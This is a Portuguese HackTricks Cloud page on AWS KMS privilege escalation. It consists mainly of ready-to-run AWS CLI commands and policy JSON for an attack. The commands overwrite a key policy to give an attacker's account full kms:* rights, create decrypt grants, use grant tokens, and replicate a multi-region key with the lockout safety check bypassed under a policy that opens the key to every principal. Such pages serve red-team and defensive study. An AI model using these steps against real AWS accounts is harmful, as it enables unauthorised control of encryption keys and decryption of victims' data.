Português - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - KMS Privesc

Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

KMS

Para mais informações sobre o KMS, consulte:

pageAWS - KMS Enum

kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)

Com essas permissões, é possível modificar as permissões de acesso à chave para que ela possa ser usada por outras contas ou até mesmo por qualquer pessoa:

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Id" : "key-consolepolicy-3",
"Statement" : [
{
"Sid" : "Enable IAM User Permissions",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<origin_account>:root"
},
"Action" : "kms:*",
"Resource" : "*"
},
{
"Sid" : "Allow all use",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : [ "kms:*" ],
"Resource" : "*"
}
]
}

kms:CreateGrant

Isso permite a um principal usar uma chave KMS:

aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt

Uma concessão só pode permitir certos tipos de operações: https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations

Note que pode levar alguns minutos para o KMS permitir que o usuário use a chave após a concessão ter sido gerada. Depois desse tempo, o principal pode usar a chave KMS sem precisar especificar nada. No entanto, se for necessário usar a concessão imediatamente, use um token de concessão (verifique o código a seguir). Para mais informações leia isso.

# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
–-key-spec AES_256 \
--grant-tokens $token

Note que é possível listar a concessão de chaves com:

aws kms list-grants --key-id <value>

kms:CreateKey, kms:ReplicateKey

Com essas permissões, é possível replicar uma chave KMS habilitada para várias regiões em uma região diferente com uma política diferente.

Assim, um atacante poderia abusar disso para obter privilégios elevados em relação à chave e usá-la

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

kms:Decrypt

Essa permissão permite usar uma chave para descriptografar algumas informações. Para mais informações, confira:

pageAWS - KMS Post Exploitation
Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

AnteriorAWS - IAM PrivescSiguienteAWS - Lambda Privesc

Última actualización